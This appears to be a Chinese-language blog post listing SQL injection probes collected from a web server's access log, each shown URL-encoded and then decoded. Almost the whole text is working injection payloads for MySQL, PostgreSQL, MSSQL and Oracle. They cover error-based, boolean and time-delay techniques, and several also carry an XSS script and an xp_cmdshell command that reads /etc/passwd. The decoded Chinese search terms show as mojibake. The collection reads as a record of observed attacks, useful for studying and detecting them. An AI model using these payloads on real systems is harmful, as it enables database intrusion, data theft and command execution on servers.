SQL Injection 一些參數範例
從 httpd log 收集到的資料
第一行是 URI
第二行是解碼資料
?q=%E9%BB%83%E8%B1%86%E6%B8%A3%E9%A3%9F%E8%AD%9C&KBow%3D2268%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%2
?q=暺�鞊�皜��蠘��&KBow=2268 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')%2
---
?q=%28SELECT%20%28CASE%20WHEN%20%284167%3D7598%29%20THEN%204167%20ELSE%204167%2A%28SELECT%204167%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%2
?q=(SELECT (CASE WHEN (4167=7598) THEN 4167 ELSE 4167*(SELECT 4167 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)%2
---
?q=%E9%BB%83%E8%B1%86%E6%B8%A3%E9%A3%9F%E8%AD%9C%29%20AND%20%28SELECT%202743%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x717a7a6a71%2C%28SELECT%20%28ELT%282743%3D2743%2C1%29%29%29%2C0x716a716271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%281419%3D141
?q=暺�鞊�皜��蠘��) AND (SELECT 2743 FROM(SELECT COUNT(*),CONCAT(0x717a7a6a71,(SELECT (ELT(2743=2743,1))),0x716a716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1419=141
---
?q=%E9%BB%83%E8%B1%86%E6%B8%A3%E9%A3%9F%E8%AD%9C%27%29%20AND%20%28SELECT%202743%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x717a7a6a71%2C%28SELECT%20%28ELT%282743%3D2743%2C1%29%29%29%2C0x716a716271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27WEdn%27%3D%27WEd
?q=暺�鞊�皜��蠘��') AND (SELECT 2743 FROM(SELECT COUNT(*),CONCAT(0x717a7a6a71,(SELECT (ELT(2743=2743,1))),0x716a716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('WEdn'='WEd
---
?q=%E9%BB%83%E8%B1%86%E6%B8%A3%E9%A3%9F%E8%AD%9C%29%20AND%203215%3DCAST%28%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283215%3D3215%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%285225%3D522
?q=暺�鞊�皜��蠘��) AND 3215=CAST((CHR(113)||CHR(122)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3215=3215) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(98)||CHR(113)) AS NUMERIC) AND (5225=522
---
?q=%E9%BB%83%E8%B1%86%E6%B8%A3%E9%A3%9F%E8%AD%9C%29%20AND%209944%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28122%29%2BCHAR%28106%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%289944%3D9944%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28113%29%29%29%20AND%20%287702%3D770
?q=暺�鞊�皜��蠘��) AND 9944=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (9944=9944) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(98)+CHAR(113))) AND (7702=770
---
?q=%E9%BB%83%E8%B1%86%E6%B8%A3%E9%A3%9F%E8%AD%9C%27%29%20AND%209944%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28122%29%2BCHAR%28106%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%289944%3D9944%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28113%29%29%29%20AND%20%28%27JZwx%27%3D%27JZw
?q=暺�鞊�皜��蠘��') AND 9944=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (9944=9944) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(98)+CHAR(113))) AND ('JZwx'='JZw
---
?q=%E9%BB%83%E8%B1%86%E6%B8%A3%E9%A3%9F%E8%AD%9C%29%20AND%203913%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283913%3D3913%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%282380%3D238
?q=暺�鞊�皜��蠘��) AND 3913=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(122)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (3913=3913) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND (2380=238
---
?q=%28SELECT%201475%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x717a7a6a71%2C%28SELECT%20%28ELT%281475%3D1475%2C1%29%29%29%2C0x716a716271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%2
?q=(SELECT 1475 FROM(SELECT COUNT(*),CONCAT(0x717a7a6a71,(SELECT (ELT(1475=1475,1))),0x716a716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a%2
---
?q=%28SELECT%20%28CHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287875%3D7875%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%29%2
?q=(SELECT (CHR(113)||CHR(122)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (7875=7875) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(98)||CHR(113))%2
---
?q=%28SELECT%20CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28122%29%2BCHAR%28106%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%288997%3D8997%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28113%29%2
?q=(SELECT CHAR(113)+CHAR(122)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (8997=8997) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(98)+CHAR(113)%2
---
?q=%E9%BB%83%E8%B1%86%E6%B8%A3%E9%A3%9F%E8%AD%9C%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2865%29%7C%7CCHR%28102%29%7C%7CCHR%28120%29%2C5%29%20FROM%20DUAL-
?q=暺�鞊�皜��蠘��);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CHR(65)||CHR(102)||CHR(120),5) FROM DUAL-
---
?q=%E9%BB%83%E8%B1%86%E6%B8%A3%E9%A3%9F%E8%AD%9C%20AND%209879%3D%28SELECT%209879%20FROM%20PG_SLEEP%285%29%2
?q=暺�鞊�皜��蠘�� AND 9879=(SELECT 9879 FROM PG_SLEEP(5)%2
---
?q=%E5%98%89%E7%BE%A9%E6%98%9F%E6%98%9F%E7%BE%A9%E5%BC%8F%E9%A4%90%E9%85%92%E9%A4%A8&MQaV%3D7055%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%2
?q=��厩儔����毺儔撘誯�鞾�㘾尹&MQaV=7055 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')%2
---
?q=%28SELECT%20%28CASE%20WHEN%20%282094%3D5802%29%20THEN%202094%20ELSE%202094%2A%28SELECT%202094%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%2
?q=(SELECT (CASE WHEN (2094=5802) THEN 2094 ELSE 2094*(SELECT 2094 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)%2
---
?q=%E5%98%89%E7%BE%A9%E6%98%9F%E6%98%9F%E7%BE%A9%E5%BC%8F%E9%A4%90%E9%85%92%E9%A4%A8%29%20AND%20%28SELECT%202215%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7178787071%2C%28SELECT%20%28ELT%282215%3D2215%2C1%29%29%29%2C0x7176787071%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%281377%3D137
?q=��厩儔����毺儔撘誯�鞾�㘾尹) AND (SELECT 2215 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(SELECT (ELT(2215=2215,1))),0x7176787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1377=137
---
?q=%E5%98%89%E7%BE%A9%E6%98%9F%E6%98%9F%E7%BE%A9%E5%BC%8F%E9%A4%90%E9%85%92%E9%A4%A8%20AND%207357%3DCAST%28%28CHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287357%3D7357%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%2
?q=��厩儔����毺儔撘誯�鞾�㘾尹 AND 7357=CAST((CHR(113)||CHR(120)||CHR(120)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (7357=7357) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(120)||CHR(112)||CHR(113)) AS NUMERIC%2
---
?q=%E5%98%89%E7%BE%A9%E6%98%9F%E6%98%9F%E7%BE%A9%E5%BC%8F%E9%A4%90%E9%85%92%E9%A4%A8%29%20AND%209411%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28120%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%289411%3D9411%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28113%29%29%29%20AND%20%286022%3D602
?q=��厩儔����毺儔撘誯�鞾�㘾尹) AND 9411=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(120)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9411=9411) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(120)+CHAR(112)+CHAR(113))) AND (6022=602
---
?q=%E5%98%89%E7%BE%A9%E6%98%9F%E6%98%9F%E7%BE%A9%E5%BC%8F%E9%A4%90%E9%85%92%E9%A4%A8%29%20AND%201452%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281452%3D1452%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%283118%3D311
?q=��厩儔����毺儔撘誯�鞾�㘾尹) AND 1452=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (1452=1452) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(120)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND (3118=311
---
?q=%28SELECT%202496%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7178787071%2C%28SELECT%20%28ELT%282496%3D2496%2C1%29%29%29%2C0x7176787071%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%2
?q=(SELECT 2496 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(SELECT (ELT(2496=2496,1))),0x7176787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a%2
---
?q=%28SELECT%20%28CHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288695%3D8695%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%29%2
?q=(SELECT (CHR(113)||CHR(120)||CHR(120)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (8695=8695) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(120)||CHR(112)||CHR(113))%2
---
?catid=4558&jvZX%3D8696%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%2
?catid=4558&jvZX=8696 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')%2
---
?catid=%28SELECT%20%28CASE%20WHEN%20%283249%3D4130%29%20THEN%203249%20ELSE%203249%2A%28SELECT%203249%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%2
?catid=(SELECT (CASE WHEN (3249=4130) THEN 3249 ELSE 3249*(SELECT 3249 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)%2
---
?catid=%28SELECT%20%28CASE%20WHEN%20%285383%3D5383%29%20THEN%205383%20ELSE%205383%2A%28SELECT%205383%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%2
?catid=(SELECT (CASE WHEN (5383=5383) THEN 5383 ELSE 5383*(SELECT 5383 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)%2
---
?catid=4558%29%20AND%20%28SELECT%207811%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7170707671%2C%28SELECT%20%28ELT%287811%3D7811%2C1%29%29%29%2C0x716a786271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%284784%3D478
?catid=4558) AND (SELECT 7811 FROM(SELECT COUNT(*),CONCAT(0x7170707671,(SELECT (ELT(7811=7811,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (4784=478
---
?catid=4558%20AND%201494%3DCAST%28%28CHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28112%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281494%3D1494%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28120%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29--%20FPY
?catid=4558 AND 1494=CAST((CHR(113)||CHR(112)||CHR(112)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (1494=1494) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(120)||CHR(98)||CHR(113)) AS NUMERIC)-- FPY
---
?catid=4558%20AND%208808%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28112%29%2BCHAR%28112%29%2BCHAR%28118%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%288808%3D8808%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%2898%29%2BCHAR%28113%29%29%2
?catid=4558 AND 8808=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8808=8808) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(120)+CHAR(98)+CHAR(113))%2
---
?catid=4558%25%27%20AND%201462%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28112%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281462%3D1462%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28120%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%2
?catid=4558%' AND 1462=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(112)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (1462=1462) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(120)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND '%'=%2
---
?catid=%28SELECT%202243%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7170707671%2C%28SELECT%20%28ELT%282243%3D2243%2C1%29%29%29%2C0x716a786271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%2
?catid=(SELECT 2243 FROM(SELECT COUNT(*),CONCAT(0x7170707671,(SELECT (ELT(2243=2243,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a%2
---
?catid=%28SELECT%20CONCAT%280x7170707671%2C%28SELECT%20%28ELT%288212%3D8212%2C1%29%29%29%2C0x716a786271%29%2
?catid=(SELECT CONCAT(0x7170707671,(SELECT (ELT(8212=8212,1))),0x716a786271)%2
---
?catid=%28SELECT%20%28CHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28112%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288146%3D8146%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28120%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%29%2
?catid=(SELECT (CHR(113)||CHR(112)||CHR(112)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (8146=8146) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(120)||CHR(98)||CHR(113))%2
---
?catid=4558%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2875%29%7C%7CCHR%28107%29%7C%7CCHR%28111%29%7C%7CCHR%28103%29%2C5%29%20FROM%20DUAL-
?catid=4558);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(107)||CHR(111)||CHR(103),5) FROM DUAL-
相關文章